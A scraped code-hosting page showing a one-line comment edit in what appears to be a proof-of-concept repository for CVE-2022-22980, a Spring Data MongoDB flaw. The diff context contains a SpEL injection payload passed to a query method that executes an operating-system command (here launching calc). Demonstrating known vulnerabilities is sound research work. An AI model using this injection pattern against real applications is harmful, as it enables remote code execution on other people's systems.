crash.software
Projects
Pull Requests
Issues
Builds
CVE-2022-22980
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
List
Boards
Milestones
Builds
Statistics
Contributions
Source Lines
Child Projects
Projects
STRLCPY
CVE-2022-22980
Commits
a74ef1c7
🤬
Sign In
rewrite comment
trganda
committed
2 years ago
a74ef1c7
1 parent
7829a191
Total 1 files
■
■
■ ■ ■ ■
src/main/java/com/example/accessingdatamongodb/AccessingDataMongodbApplication.java
skipped 37 lines
38
38
// fetch an individual customer
39
39
System.out.println("Customer found with findByFirstName('Alice'):");
40
40
System.out.println("--------------------------------");
41
-
//
Eval
query
41
+
//
Evil
query
42
42
System.out.println(repository.findByFirstName("T(java.lang.Runtime).getRuntime().exec(\"calc\")"));
43
43
// Normal query
44
44
System.out.println(repository.findByFirstName("Alice"));
skipped 5 lines
All occurrences
Please wait...
Page is in error, reload to recover